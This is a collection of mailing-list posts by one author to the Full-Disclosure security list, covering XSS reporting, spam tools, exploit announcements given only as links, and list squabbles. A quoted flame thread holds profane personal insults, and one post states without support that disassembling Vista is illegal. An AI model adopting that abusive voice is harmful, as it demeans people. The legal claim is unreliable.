planned to correct the errors in the book and/or fine tune > the 
examples? Didn't find anything on the wiley.com.>> Cheers,> 
B>> ___> 
Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html> 
Hosted and sponsored by Secunia - http://secunia.com/ >>> 
--> No virus found in this incoming message.> Checked by AVG 
Free Edition.> Version: 7.1.394 / Virus Database: 268.9.10/386 - 
Release Date: 
12/07/2006>___ 
Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted 
and sponsored by Secunia - http://secunia.com/-- http://peterdawson.typepad.comPeterDawson 
  Home of ThoughtFlickr's "This message is printed on Recycled Electrons." 
  
  

  ___Full-Disclosure - We 
  believe in it.Charter: 
  http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored 
  by Secunia - http://secunia.com/
  
  

  No virus found in this incoming message.Checked by AVG Free 
  Edition.Version: 7.1.394 / Virus Database: 268.9.10/386 - Release Date: 
  12/07/2006
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] To XSS or not?

[Aaron Gray]

Maybe there should be a special XSS list that could specialize in that area 
?


Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] To XSS or not?

[Aaron Gray]

Major ones could still be reported on the other lists.

Aaron


something like xsstraq powered on securityfocus should be cleaner yep :)

Maybe there should be a special XSS list that could specialize in that 
area ?


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Please help to spam [EMAIL PROTECTED]

[Aaron Gray]

I have a sugestion.


I have a better solution. zip them up in a .tar.gz file and put them online.

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Crap capitalistic artical in PC World mentions Full Disclosure

[Aaron Gray]

Take alooky at this :-
 
    
http://www.pcworld.com/news/article/0,aid,126438,tk,nl_wbxnws,00.asp
 
Is that the best they can muster ?
 
Aaron
 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] To XSS or not?

[Aaron Gray]

how we will measure which one is major and which not ?
major for you is minor for me and vice versa.


Major is an XSS on a well used "major"web site, or a financial based webh
site even if it is a "minor" web site. A "minor" XSS web vulnability is one
on a little known site.
Hope you argee with this definition.


if we agree that XSS are vulns (i personally agree) then they deserve to
be reported. Just look at the subject of the message that report a XSS
and choose to read it or to not read it.


Yes I do, but I think a spcialized list is in order for web vulnabilities.


XSS are based on bad code practices .. some day the programmers will
learn to not make such mistakes if we point them. if we ignore them 
well security is not based on ignorance.


Yes I need to learn about this area as I am doing a couple of PHP&MySQL
based web sites myself and would like a specialized list to ask Q's on.

Regards,

Aaron


Aaron Gray wrote:

Major ones could still be reported on the other lists.

Aaron


something like xsstraq powered on securityfocus should be cleaner yep :)


Maybe there should be a special XSS list that could specialize in
that area ?


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Please help to spam [EMAIL PROTECTED]

[Aaron Gray]

i am sure that some one from the bayes mailing list can help you :-))
just check you friend google


But Google was not so friendly, here it is anyway :-

   http://spambayes.sourceforge.net/

There is a mailing list too :-

   http://mail.python.org/mailman/listinfo/spambayes

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] RE: Crap capitalistic artical in PC World

[Aaron Gray]

I think you're confusing the PRACTICE with the LIST.
They're not talking about us.


Yes I know but it is a bit half and half,

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Crap capitalistic artical in PC Worldmentions Full Disclosure

[Aaron Gray]

Here's a better response to McAffee than the PC World piece.  In the
interest of full disclosure, I might add that the author is a close
personal friend of mine.  ;)

http://www.newsforge.com/article.pl?sid=06/07/15/1331229


Tells it like it is :)

Thats a bit better to say the least. Under any normal circumstances 'Sage' 
would be up for liable !


Cheers,

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Firefox fun

[Aaron Gray]

The demonstration exploit now works on Windows, Linux, and both
architectures of Mac OS X. A friend of mine reported that is also works
on the Camino browser:

http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html

Enjoy,


Crashes IE6 on XP. Well crashed taking 270MB of memory !

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] OT: Looking for hacker who can do an Outlook Express extension library

[Aaron Gray]

Hi,
 
I am wanting to put together an extension for MS 
Outlook Express that will enable open source anti spam programs to be integrated 
with it. Rather than just intercepting POP3 I would like to intercept the mail 
"inside" OE and add buttons for marking SPAM to be deleted and pickup their IP 
addess and email address for a blacklist.
 
I am a reasonable programmer myself, I know C++ and 
COM but have no idea about how to go about this task. I have put posts on Win32 
news group but with no reply.
 
Any help will be more than welcome.
 
Aaron
 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] OT: Looking for hacker who can do anOutlookExpress extension library

[Aaron Gray]

http://www.jam-software.com/freeware/index.shtml

http://www.jam-software.com/freeware/SpamAware-Setup.exe <--Direct 
download.


Look at Spamaware, 2nd paragraph.


I was after something open source.

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Getting rid of Gadi Evron and Dude VanWinkle

[Aaron Gray]

l4m3r

vodka hooch wrote:

hi
 
for months now we've had to put up
 
now its time to shut up
 
how do i setup my gmail?
 
i know this is unmoderated list but im pulling my hair out to sift 
through the real email
 
please dont turn full dis into symantec trolltraq, hlp me! :)
 
-gs
 



Yahoo! Messenger with Voice. Make PC-to-Phone Calls 
 
to the US (and 30+ countries) for 2¢/min or less.



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


No virus found in this incoming message.
Checked by AVG Free Edition.
Version: 7.1.405 / Virus Database: 268.10.9/417 - Release Date: 11/08/2006
  


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] full dis explicit content no good full dis important reason

[Aaron Gray]

Please learn English !

vodka hooch wrote:

full dis emergency exploits no porno acceptable
 
emergency exploits only full dis
 
government and business need full dis important reason
 
-gs
 
 



Stay in the know. Pulse on the new Yahoo.com. Check it out. 




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


No virus found in this incoming message.
Checked by AVG Free Edition.
Version: 7.1.405 / Virus Database: 268.10.10/419 - Release Date: 15/08/2006

  


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] n3td3v: viva end of n3td3v----and security group

[Aaron Gray]

Yeah, netnoodles going to learn to read and write, including grammar, 
tence and punctuation !


n3td3v wrote:

n3td3v with the beginning Spetember 1st 2006 is the end of n3td3v
commentry via Full-Disclosure list or any other medium. This is
because n3td3v is moving into the professional scene, so underground
hacker scene isn't suitable for the n3td3v agenda. The agenda now is
to lay low and say nothing. n3td3v understands the security community
needs n3td3v, but n3td3v needs to follow career paths into an academic
life style away from the homebred/international hacker community.
Thank you Yahoo and Google for being a part of my life during the past
7/half years, its been a blast. Take care security community, the
force of n3td3v is with you. Our final death wish is that the security
community cross-posts to [EMAIL PROTECTED], see our mailing list
at http://groups.google.com/groups/n3td3v ---all communications for
n3td3v group are being passed over to co-commandersthe n3td3v
founder and commander in chief is no longer in charge of n3td3v
operational decisions-enjoy the rest of your life. We'll be in
touchdon't forget the power of n3td3v, we're not dead, we're
changing command..good bye---for now. Its time for n3td3v to goto
academic and move on with the agenda that serves us. Google and Yahoo,
good bye, your staff have been briefed on operational detail in
private for the following years ahead as we prepare to reduce public
relatiions on mailing lists and go fully underground! Add the n3td3v
mailing list to your books, this has been a n3td3v production...the
rest is upto you to bring the biggest corporations to its knees!  rest
in peace...

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Windows PE Checksums

[Aaron Gray]

Hi,
 
I was checking out Windows PE 
checksums.
 
And found they do not seem to get checked when 
executing a .exe file.
 
Neither does 'dumpbin' check the 
checksum.
 
Does anyone know of a program (Ideally free and 
ideally open source) that checks PE checksums ?
 
Aaron
 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] tar alternative

[Aaron Gray]

Tim wrote:

  
Don't. Untar. Archives. As. Root.

It's that simple.

Or are you also going to complain about the fact that there are tar
versions out there that don't strip a leading / from the archive?
Much fun can be had when you carelessly extract as root, then.

  
  
Hello,

Sorry to change the subject slightly here on this thread, but I was
wondering about this before the topic came up.

Given the problems with using the tar format for file distribution, are
there any other simple, non-compressed file-grouping formats out there
that weren't originally designed for backups (e.g. don't contain
usernames, permissions, etc)?  Something that can be a drop-in
replacement for tar and thus can integrate with gzip/bzip2 easily?
(Don't even say .zip)

There's probably one out there I'm completely naive about, but I haven't
seen one yet that would be a safer alternative.

  


cpio ?

It does the job of both tar and gzip. Try an :-

       info cpio

As for the Linux Kernel archives, I do not really think there is enough
justification for a change in distribution format.

Most kernel coders either use non root account for untar'ing and making
the kernel and do a 'sudo make install' anyway.

My 0.02cents worth,

Aaron



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Is Firefox JavaScript flawed ?

[Aaron Gray]

Can anyone give me the low down on the 
(questionable) FireFox _javascript_ vulnerabilities ?
 
Many thanks in advance,
 
Aaron
 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] MS are doing Windows Updates for XP to IE7

[Aaron Gray]

Hi,
 
Just got this news :-
 
    
http://www.washingtonpost.com/wp-dyn/content/article/2006/10/28/AR2006102800029.html
 
Is this a bad thing or a bad bad thing 
?
 
Can it be circumvented ? Do I have to turn off Auto 
Update and do Custom updates via IE ?
 
Open for comments,
 
Aaron
 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] OT: Stern Environmental Review, a British Government Report published Online

[Aaron Gray]

The Stern Environmental Review, a British 
Government Report into tackeling global climate change has been published 
online.
 
Leader page with presentation and speaking notes 
:-
 
        
http://www.hm-treasury.gov.uk/independent_reviews/stern_review_economics_climate_change/sternreview_index.cfm
 
The Stern Review Report :-
 
    
http://www.hm-treasury.gov.uk/independent_reviews/stern_review_economics_climate_change/stern_review_report.cfm
 
Aaron
 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Wireless fun!

[Aaron Gray]

Looks like Microsoft have done an update on the Broadcom .SYS driver on the 
5th of Novmber.

Aaron

- Original Message - 
From: "H D Moore" <[EMAIL PROTECTED]>
To: 
Sent: Monday, November 13, 2006 6:45 PM
Subject: [Full-disclosure] Wireless fun!


> Shiny new (remote) kernel-mode exploits for Metasploit 3:
>
> http://kernelfun.blogspot.com/2006/11/mokb-13-11-2006-d-link-dwl-g132.html
> http://kernelfun.blogspot.com/2006/11/mokb-11-11-2006-broadcom-wireless.html
>
> -HD
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> -- 
> No virus found in this incoming message.
> Checked by AVG Free Edition.
> Version: 7.1.409 / Virus Database: 268.14.3/531 - Release Date: 12/11/2006
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Wireless fun!

[Aaron Gray]

> Looks like Microsoft have done an update on the Broadcom .SYS driver on 
> the
> 5th of Novmber.

Not too sure actually whether it was it could have been running and removing 
the LinkSys driver that did the update. Can someone verify this ?

Aaron

> - Original Message - 
> From: "H D Moore" <[EMAIL PROTECTED]>
> To: 
> Sent: Monday, November 13, 2006 6:45 PM
> Subject: [Full-disclosure] Wireless fun!
>
>
>> Shiny new (remote) kernel-mode exploits for Metasploit 3:
>>
>> http://kernelfun.blogspot.com/2006/11/mokb-13-11-2006-d-link-dwl-g132.html
>> http://kernelfun.blogspot.com/2006/11/mokb-11-11-2006-broadcom-wireless.html
>>
>> -HD
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>> -- 
>> No virus found in this incoming message.
>> Checked by AVG Free Edition.
>> Version: 7.1.409 / Virus Database: 268.14.3/531 - Release Date: 
>> 12/11/2006
>>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> -- 
> No virus found in this incoming message.
> Checked by AVG Free Edition.
> Version: 7.1.409 / Virus Database: 268.14.5/534 - Release Date: 14/11/2006
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [OOT] Thesis for master degree

[Aaron Gray]

>- Disassembling Vista Security

This is illegal. So not a very good idea for the thesis.

Aaron
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Windows is very holy

[Aaron Gray]

Windows is very very holy.

Microsoft may draw castles guarded by lions round PC's in adverts but we
know better.

Aaron
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows is very holy

[Aaron Gray]

Sorry a dog not lions !
  - Original Message - 
  From: Aaron Gray 
  To: full-disclosure@lists.grok.org.uk 
  Sent: Thursday, December 21, 2006 2:28 AM
  Subject: [Full-disclosure] Windows is very holy


  Windows is very very holy.

  Microsoft may draw castles guarded by lions round PC's in adverts but we know 
better.

  Aaron



--


  ___
  Full-Disclosure - We believe in it.
  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
  Hosted and sponsored by Secunia - http://secunia.com/


--


  No virus found in this incoming message.
  Checked by AVG Free Edition.
  Version: 7.1.409 / Virus Database: 268.15.25/593 - Release Date: 19/12/2006
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows is very holy

[Aaron Gray]

Its all greek to me :)

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows is very holy

[Aaron Gray]

> On Thu, 2006-12-21 at 20:37 -0500, Jim Popovitch wrote:
>> On Thu, 2006-12-21 at 02:28 +0000, Aaron Gray wrote:
>> > Windows is very very holy.
>>
>> Don't you mean hole'y?  ;-)

Probably.

> OK, why do I get bounce messages from

I silly enought to have originally posted this post to N3TD3V's Google List. 
He is forwarding to FD and other security lists that are bouncing.

Sorry,

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Test Posting

[Aaron Gray]

I think N3TD3V is posting to new mailing lists and groups between FD and NETDEV 
google group and those extra postings are bouncing. Not totally sure but this 
is a test.

Aaron
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] PC/Laptop microphones - shut the mouth Valdis

[Aaron Gray]

Your mastery of the English language is crap.

- Original Message - 
From: "Ham Beast" <[EMAIL PROTECTED]>
To: 
Sent: Tuesday, January 30, 2007 11:52 PM
Subject: Re: [Full-disclosure] PC/Laptop microphones - shut the mouth Valdis


> And apparently, he's still pissed that *he* didn't get invited to be
> part of the snosoft crew. :)

Who the fuck would want to work in any way for Snosoft? Any one does
not remember the jokes neverending on mastery of KF of the Perl to
copy the letter A 4096 times? They are probably the greatest joke in
the industry that is saying something me left saying. Simon Smith also
buffoon seems to be from posts recent, shoes of clown apparent.

> Auto:  You get invited to work places by being somebody that the people
> *want* to work with.  Being a narrow-minded bigot that can't find the
> Caps Lock key doesn't help, unless you want to be limited to working
> with other narrow-minded bigots who can't find that key *either*.
>

Valdis, close the fuck mouth. Our analysis sending statistics of the
list MORE HIGHLY shows its counting of the Valdis post to the lists of
the security to be an ORDER OF MAGNITUDE greater of what all the other
poster count of posts.

Who the fuck IS PAYING Valdis not to make nothing but to affix the
entire day babble pointless worthless sending to the lists. You is the
last person of world that must give the advice of the work in peoples
since that you must clearly should have been FIRED diverse years you
have ago. It is certainty bàsicamente 100% that you wear a jacket
sports to work daily.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


-- 
No virus found in this incoming message.
Checked by AVG Free Edition.
Version: 7.1.410 / Virus Database: 268.17.15/659 - Release Date: 30/01/2007

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Every MS Exploit

[Aaron Gray]

I believe there are more than one exploit for each MS "patch".

Aaron

- Original Message - 
From: <[EMAIL PROTECTED]>
To: 
Sent: Tuesday, February 06, 2007 5:31 AM
Subject: [Full-disclosure] Every MS Exploit


> Project to find exploits for every MS Security Bulletin gets wiki’ed
>
> Last September (part 1) http://ElseNot.com contributed it’s collocation 
> and goal (try to find an exploit for every MS Security Bulletin ever 
> released). Activity stopped when Microsoft published 473 bulletins and 163 
> Exploits had been found.
>
> Now part 2 of www.ElseNot.com is raising the bar and going wiki. Instead 
> of
> just trying to get "a exploit", it is trying to get "every exploit". Now 
> you don't have to rely on one person updating it. Do it your self, create 
> a time line of exploit releases, document techniques and add other OS'es. 
> This is the place to consolidate all the vulnerability information 
> floating around the net, your head and mailing lists.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/





No virus found in this incoming message.
Checked by AVG Free Edition.
Version: 7.1.411 / Virus Database: 268.17.26/670 - Release Date: 05/02/2007

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/